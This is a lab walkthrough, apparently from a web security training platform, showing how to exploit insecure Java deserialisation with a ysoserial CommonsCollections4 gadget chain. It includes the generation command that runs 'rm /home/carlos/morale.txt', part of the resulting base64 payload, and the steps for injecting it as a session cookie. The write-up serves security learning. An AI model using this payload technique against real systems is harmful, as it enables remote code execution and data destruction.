Exploiting Java deserialisation with Apache Commons

Description

This lab uses a serialisation-based session mechanism and loads the Apache Commons Collections library.

Reproduction

  1. Log in with wiener:peter. The session cookie is URL and base64 encoded and contains a serialised Java object (the first two bytes are aced). Send a request containing the session cookie to Burp Repeater.

  2. Download the Ysoserial tool, if need be, make the on kali necessary changes to run it.

  3. Execute the command to generate a Base64-encoded serialised object containing an RCE payload. The application uses Apache Commons Collections library, so use a CommonsCollections payload:

$ java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBh
cmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9u
cy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjM
AgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMv
...

  1. In Burp Repeater, replace the session cookie with the malicious one just created. Select the entire cookie and then URL-encode it.

  2. Send the request to solve the lab.

PoC

Exploitability

Although attackers do not have source code access, they can still exploit this lab using pre-built gadget chains. An attacker will need to log in; use a third-party tool to generate a malicious serialised object containing a remote code execution payload; and pass this object into the website to delete the morale.txt file from Carlos’s home directory.